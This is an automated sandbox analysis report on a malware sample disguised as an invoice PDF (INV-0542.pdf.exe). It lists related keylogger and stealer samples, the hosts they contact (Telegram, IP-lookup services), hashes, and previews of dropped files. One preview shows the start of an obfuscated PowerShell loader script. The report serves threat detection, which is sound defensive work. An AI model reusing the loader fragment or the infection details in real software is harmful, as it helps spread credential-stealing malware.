                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              #U06a9#U067e#U06cc #U067e#U0631#U062f#U0627#U062e#U062a - 19112024,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              wMy37vlfvz.exeGet hashmaliciousDarkCloudBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              dekont 25.11.2024 PDF.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              checkip.dyndns.comjbuESggTv0.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                              • 158.101.44.242
                                                                                                                                                              tJzfnaqOxj.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                              • 193.122.130.0
                                                                                                                                                              LAQfpnQvPQ.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                              • 193.122.130.0
                                                                                                                                                              November Quotation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                              • 193.122.130.0
                                                                                                                                                              #U06a9#U067e#U06cc #U067e#U0631#U062f#U0627#U062e#U062a - 19112024,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 193.122.6.168
                                                                                                                                                              F7Xu8bRnXT.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                              • 158.101.44.242
                                                                                                                                                              dekont 25.11.2024 PDF.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 132.226.8.169
                                                                                                                                                              AWB NO - 09804480383.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                                              • 132.226.247.73
                                                                                                                                                              denizbank 25.11.2024 E80 aspc.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 193.122.130.0
                                                                                                                                                              Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                              • 193.122.6.168
                                                                                                                                                              reallyfreegeoip.orgjbuESggTv0.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                              • 172.67.177.134
                                                                                                                                                              tJzfnaqOxj.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                              • 172.67.177.134
                                                                                                                                                              LAQfpnQvPQ.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                              • 172.67.177.134
                                                                                                                                                              November Quotation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                              • 172.67.177.134
                                                                                                                                                              #U06a9#U067e#U06cc #U067e#U0631#U062f#U0627#U062e#U062a - 19112024,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 104.21.67.152
                                                                                                                                                              F7Xu8bRnXT.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                              • 172.67.177.134
                                                                                                                                                              dekont 25.11.2024 PDF.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 172.67.177.134
                                                                                                                                                              AWB NO - 09804480383.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                                              • 104.21.67.152
                                                                                                                                                              denizbank 25.11.2024 E80 aspc.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 104.21.67.152
                                                                                                                                                              Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                              • 172.67.177.134
                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                              TELEGRAMRUDJ5PhUwOsM.exeGet hashmaliciousAgentTesla, XWormBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              2ehwX6LWt3.exeGet hashmaliciousXWormBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              Mzo6BdEtGv.exeGet hashmaliciousXWormBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              tE3ZXBTP0B.exeGet hashmaliciousXWormBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              Pe4905VGl1.batGet hashmaliciousAsyncRATBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              MSM8C42iAN.exeGet hashmaliciousDarkCloudBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              November Quotation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              #U06a9#U067e#U06cc #U067e#U0631#U062f#U0627#U062e#U062a - 19112024,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              wMy37vlfvz.exeGet hashmaliciousDarkCloudBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              dekont 25.11.2024 PDF.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              UTMEMUSdekont 25.11.2024 PDF.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 132.226.8.169
                                                                                                                                                              AWB NO - 09804480383.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                                              • 132.226.247.73
                                                                                                                                                              order requirements CIF-TRC809910645210.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                              • 132.226.8.169
                                                                                                                                                              NEW P.O.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                              • 132.226.247.73
                                                                                                                                                              MC8017774DOCS.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 132.226.8.169
                                                                                                                                                              New shipment AWB NO - 09804480383.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                                              • 132.226.247.73
                                                                                                                                                              rorderrequirementsCIF-TRC809910645210.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                              • 132.226.247.73
                                                                                                                                                              PaymentAdvice.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                              • 132.226.247.73
                                                                                                                                                              S50MC-C_3170262-7.6cylinder_liner.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 132.226.247.73
                                                                                                                                                              Papyment_Advice.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                              • 132.226.8.169
                                                                                                                                                              CLOUDFLARENETUSEvidence of copyright infringement (2).batGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 104.21.81.137
                                                                                                                                                              Evidence of copyright infringement.batGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 172.67.189.157
                                                                                                                                                              Compilation of videos and images protected by copyright.batGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 104.21.81.137
                                                                                                                                                              Verzameling van video's en afbeeldingen die beschermd zijn door auteursrecht (2).batGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 104.21.81.137
                                                                                                                                                              file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                              • 172.64.41.3
                                                                                                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                              • 104.21.7.169
                                                                                                                                                              X4S15uEwg5.batGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 104.21.81.137
                                                                                                                                                              JDHh9P2IVM.batGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 104.21.81.137
                                                                                                                                                              wzvdwjAw2x.batGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 172.67.189.157
                                                                                                                                                              document.lnk.download.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 104.21.81.137
                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                              54328bd36c14bd82ddaa0c04b25ed9adjbuESggTv0.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                              • 172.67.177.134
                                                                                                                                                              tJzfnaqOxj.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                              • 172.67.177.134
                                                                                                                                                              LAQfpnQvPQ.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                              • 172.67.177.134
                                                                                                                                                              November Quotation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                              • 172.67.177.134
                                                                                                                                                              #U06a9#U067e#U06cc #U067e#U0631#U062f#U0627#U062e#U062a - 19112024,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 172.67.177.134
                                                                                                                                                              F7Xu8bRnXT.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                              • 172.67.177.134
                                                                                                                                                              dekont 25.11.2024 PDF.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 172.67.177.134
                                                                                                                                                              AWB NO - 09804480383.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                                              • 172.67.177.134
                                                                                                                                                              denizbank 25.11.2024 E80 aspc.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 172.67.177.134
                                                                                                                                                              Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                              • 172.67.177.134
                                                                                                                                                              3b5074b1b5d032e5620f69f9f700ff0eEvidence of copyright infringement (2).batGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              Evidence of copyright infringement.batGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              Compilation of videos and images protected by copyright.batGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              Verzameling van video's en afbeeldingen die beschermd zijn door auteursrecht (2).batGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              xeno.batGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              X4S15uEwg5.batGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              JDHh9P2IVM.batGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              wzvdwjAw2x.batGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              Compilazione di video e immagini protetti da copyright.batGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              37f463bf4616ecd445d4a1937da06e19MSM8C42iAN.exeGet hashmaliciousDarkCloudBrowse
                                                                                                                                                              • 142.250.181.1
                                                                                                                                                              • 172.217.19.174
                                                                                                                                                              November Quotation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                              • 142.250.181.1
                                                                                                                                                              • 172.217.19.174
                                                                                                                                                              PO_203-25.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                              • 142.250.181.1
                                                                                                                                                              • 172.217.19.174
                                                                                                                                                              wMy37vlfvz.exeGet hashmaliciousDarkCloudBrowse
                                                                                                                                                              • 142.250.181.1
                                                                                                                                                              • 172.217.19.174
                                                                                                                                                              WNIOSEK BUD#U017bETOWY 25-11-2024#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                              • 142.250.181.1
                                                                                                                                                              • 172.217.19.174
                                                                                                                                                              file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                              • 142.250.181.1
                                                                                                                                                              • 172.217.19.174
                                                                                                                                                              file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                              • 142.250.181.1
                                                                                                                                                              • 172.217.19.174
                                                                                                                                                              412300061474#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                              • 142.250.181.1
                                                                                                                                                              • 172.217.19.174
                                                                                                                                                              order requirements CIF-TRC809910645210.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                              • 142.250.181.1
                                                                                                                                                              • 172.217.19.174
                                                                                                                                                              Cargo Invoice_pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                              • 142.250.181.1
                                                                                                                                                              • 172.217.19.174
                                                                                                                                                              No context
                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:modified
                                                                                                                                                              Size (bytes):53158
                                                                                                                                                              Entropy (8bit):5.062687652912555
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
                                                                                                                                                              MD5:5D430F1344CE89737902AEC47C61C930
                                                                                                                                                              SHA1:0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
                                                                                                                                                              SHA-256:395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
                                                                                                                                                              SHA-512:DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:moderate, very likely benign file
                                                                                                                                                              Preview:PSMODULECACHE.G.......%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm
                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):60
                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:high, very likely benign file
                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):60
                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:high, very likely benign file
                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):60
                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):60
                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):923768
                                                                                                                                                              Entropy (8bit):7.64877023008813
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24576:ZX22KSCC4VSi/kKJfaklq2E3l8Et2F2Yurik:9ylCQLJfaklc3uEtUWT
                                                                                                                                                              MD5:FA02056B1A21F75EFABDDA81219FB7DB
                                                                                                                                                              SHA1:3E8DD711BFEF09D2DB54AF75476765D85693C756
                                                                                                                                                              SHA-256:23BE2A96F4C15306083C180774452E11F42837E297627CD33AD5A9708953CD4C
                                                                                                                                                              SHA-512:AF4C4A9D7E6EDE0026548136FA4B7C37F8298D055A835A56BAF9795BC5B0B3A034A5E2DD2592476C3479FE8B23DA338AD615144A91A61B3A47DD6BEE00DE8088
                                                                                                                                                              Malicious:true
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 11%
                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN.s~..PN..VH..PN.Rich.PN.........................PE..L....C.f.................f...".......5............@.......................................@..............................................z..........P...(............................................................................................text...ve.......f.................. ..`.rdata..X............j..............@..@.data...8............~..............@....ndata...................................rsrc....z.......|..................@..@................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):26
                                                                                                                                                              Entropy (8bit):3.95006375643621
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:ggPYV:rPYV
                                                                                                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                              Process:C:\Users\user\Desktop\INV-0542.pdf.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (338), with no line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):338
                                                                                                                                                              Entropy (8bit):4.307059828439222
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:6:wXW0N+ueXy8QT/DLlbCqbtidDt4jHID5GXsW/uyiNXSgP/CAjTOB+M9E+n:wXW0GXK/XlTbtq5Nt6/u3HCA2B+M9E+n
                                                                                                                                                              MD5:465F76EC7C2B514001DF749A302E6BFB
                                                                                                                                                              SHA1:F00C03E1DAC98A5F44C3920E49D73535945F5188
                                                                                                                                                              SHA-256:63B00F84026BA825D47D2185D7CD819AD9059DAC82BDBC30AD133ECB05327E7F
                                                                                                                                                              SHA-512:E72609AA7C0B54E17A0ABC784CF599ACBA2149B232880F9F25D08E2326F295DFB7607EC9CB1922B547F9495FE4ED25D4A4B1F2724D8EDA1A234F7EB2CC5235FC
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:jgt pensionrerne overhands hedley helmuths offensives.vgtklasses countercharged hideaways.kassandras courtiership organics ejectum gaffeltrucket,toothachy fellowlike hesiometre stripfilm kuldslaaendes,overenskomstresultaternes stitrernes konfessionen mandhaftig.communiqu fuldtidsbeskftigelsen bnkebiderne stberiers hors beached pallette,
                                                                                                                                                              Process:C:\Users\user\Desktop\INV-0542.pdf.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):325105
                                                                                                                                                              Entropy (8bit):7.687998286812587
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:6144:WrPibNHxUcqJfd8U3/PO4eJpEnQ5o3gQ3qudcPP2UiR61Vmybn04FyhVEKwWKoLf:YPINHScofmI/PO4eAQ+3gQ3hcPZiR6fK
                                                                                                                                                              MD5:ED6A752AFAAB73E3A33D22575CB787B6
                                                                                                                                                              SHA1:1C358CBCBA2041F9A7EA8F0083CB1F404C3D459F
                                                                                                                                                              SHA-256:1D4D52364EB7B2E04042E21D69AAE9191875155491920A45B590ABED8979CD11
                                                                                                                                                              SHA-512:484A6B62681858E6F1A8FB04CA58B83240BB7F7730822ADD1DEB47B3737E7A3E4AEE758D37C45944113296A21E6E0B78187C799E286BEA7A4227EDE75169F5B0
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:..........ZZZZZ......fff...6........................Y........EE.........ttt..>>................... ..........(((....aa....KKKKK....................+.PPPPP...........%....,........|.............666.............>...[[[[[[........##...*.......d.........s..EE.......99.........R...............................ff......II.......EE............))......v....<.....OOO.-...............000...x..__.........................iiiii.R.O....HH..............................q...........W..................[...........E.""".....<.88...1....v........a...U.............|.........BBB.I...................h...E.G...8.......................!.....333........u...........I...."""..................GGGGG.................;.............I.|....................W.....................33...............U............................................B.........;..........I...?.].......9.............:..BB......................dddd................ZZ............................GG................................ .................**......
                                                                                                                                                              Process:C:\Users\user\Desktop\INV-0542.pdf.exe
                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (4407), with CRLF, LF line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):72998
                                                                                                                                                              Entropy (8bit):5.189057958402504
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:1536:8cAlFYb38W/jz7HxxJRhWEBhZNmgA2h6nJmnY5ERN:VAwbswjzNWSXmDeEJmYy
                                                                                                                                                              MD5:C5AA2DAB45CC230922FAE97020EBAB32
                                                                                                                                                              SHA1:A20E5E5E121C6BD952EB42A1EC04F81641D28B63
                                                                                                                                                              SHA-256:6DBAD8626BF3199EE7B0B29ED5E63FD0A3435C50DA9999ACEE9BB0996C0BC13D
                                                                                                                                                              SHA-512:CAAF4D1CEFE49A7509858FD59E96FFB7C7B3F7A210FC9D56CEECCD6594E77FDFE6F834F85E9D9E1C83EA9046B96987BDF1E8EE73A0047E39A32874448DF50F57
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:$Cymbalist=$Subinvolute;.....<#Invalidepensionisternes Lvstikke Unimpassionately Oplag centralamerikas Sackage #>..<#Spinnel dullishly etypical Hapsedes Protokollater Ldigeres #>..<#Sidetallets Gennemsynenes hjernetrust Inodes #>..<#Fretted Rekylgevrer Britzska Nevertheless Flyttedag Narwhals #>..<#Vaselinens Lichenological Sephira Nyphomania #>..<#Pedicures overblikkets Sludrehoveds Doorsill Prvetider Rhodeose #>...$Brystfinners = @'.Syodico. eltans$KundekaTDragneth At itueRabarbeo OpiumsdFitcheriV sorlidRadianeaFilka ac Denom.t,huesudaInsuressRuesapoiSi.downlUdm,striOpbevarc Far,syapsorahybForjaskcPostmyx= F rsee$ KogalsR MuttelePaginernS yttessKommunikLejeforrProfileituberk nMethadogApprense idetngrNy igessS.ridul;Rerewar.Pediculfsvedig.uKaraktenUnrecalcVindertt Uncleai h stogoDelkoranLiteral prole aOCarrycoo AsynchmStockcai S.praoa ChunkycTaneprosEspalie Bateaux(knaphul$scathfuTTetrahehDaadrigeCoef proReo,ferdCourbeti Fairfod SylvieaDybhavec KontaktAllegroanost.ifsfadlslai enzintl
                                                                                                                                                              Process:C:\Users\user\Desktop\INV-0542.pdf.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):454486
                                                                                                                                                              Entropy (8bit):1.2524987371551821
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:1536:v0ynJn+FyRFgfJzXCCuWE44ok+4FoPtBNuNi:v0ynJtFgfJW544oeWH
                                                                                                                                                              MD5:F4323CDDCA33656C45D3017DBB494458
                                                                                                                                                              SHA1:6B9284C25151843B71F790399CBAE4BD17109871
                                                                                                                                                              SHA-256:B5F229D8FCD6FE20FCED25B4714776C43CD2A7BEBDB1DEA828626A9053B0D83D
                                                                                                                                                              SHA-512:A3CC6B0945806B795724A708128F632682FF608081099CC7BFD9E6DF2C0C9BBE7D47C15178C9065BF5E24020DF0E74EE5BF3ED52BA7CE570E7D7AC30590271A3
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:........................!.A......v................................ ................e...........X............................Y............>..........5..O"..........................................N.....4..............t.....................................................................2..................b.........%...........q.....................[......7...............>....................................................................................O...................................<................................Z....................................#.....................................................I.........`....................................V................................,.......................................;........................................................Q........................................P.............................d=...............\..................................................8.............................,..........B........................
                                                                                                                                                              Process:C:\Users\user\Desktop\INV-0542.pdf.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):409946
                                                                                                                                                              Entropy (8bit):1.2535737381103589
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:1536:3pKI3cbwZj87HWgWRQy56IrWKlUHAGqheijKK:738u5rCAThz
                                                                                                                                                              MD5:4FF250D172D6AA46629B269AC732435B
                                                                                                                                                              SHA1:221C813C3C21A049AAC6E1625D128153743BD0BB
                                                                                                                                                              SHA-256:F6E5E9B0245658FF93C7335D7FDD1AA4ED097FFD0D48ABCB23D07A11D49E3040
                                                                                                                                                              SHA-512:5456EA2C0FF252FC830670C5293B24D555C0728F3ECD25E3485E656176FFD039C14ACCE93402816FB96A36B19A836D2A84E9429A2D04745BDE9D011CB91189B7
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:.8....L...........a..E...........................T................................................W.....j...............................i...............................qB....................B........................................D.................=................................................j...................:..................................../...G..............................................................................8..................................................M........m..................................>...............>...........................................................-......................................u..............._.......7...........................=.........]....................................................................................................................................k................;..............................................p...................................~\....................m..........................P...
                                                                                                                                                              Process:C:\Users\user\Desktop\INV-0542.pdf.exe
                                                                                                                                                              File Type:Matlab v4 mat-file (little endian) , numeric, rows 0, columns 0
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):377855
                                                                                                                                                              Entropy (8bit):1.2480133053641047
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:768:T3j4B9Djpmub8VeOfAGor4RPrbZq9IFK9OTwdiY6d7Cl9v/sqiXIaIgIo4Vcrn/S:29P9dWwwPEofIxXG5DHJ/v/X
                                                                                                                                                              MD5:04F33F90D56994EC3DCDFC7981DC9AA0
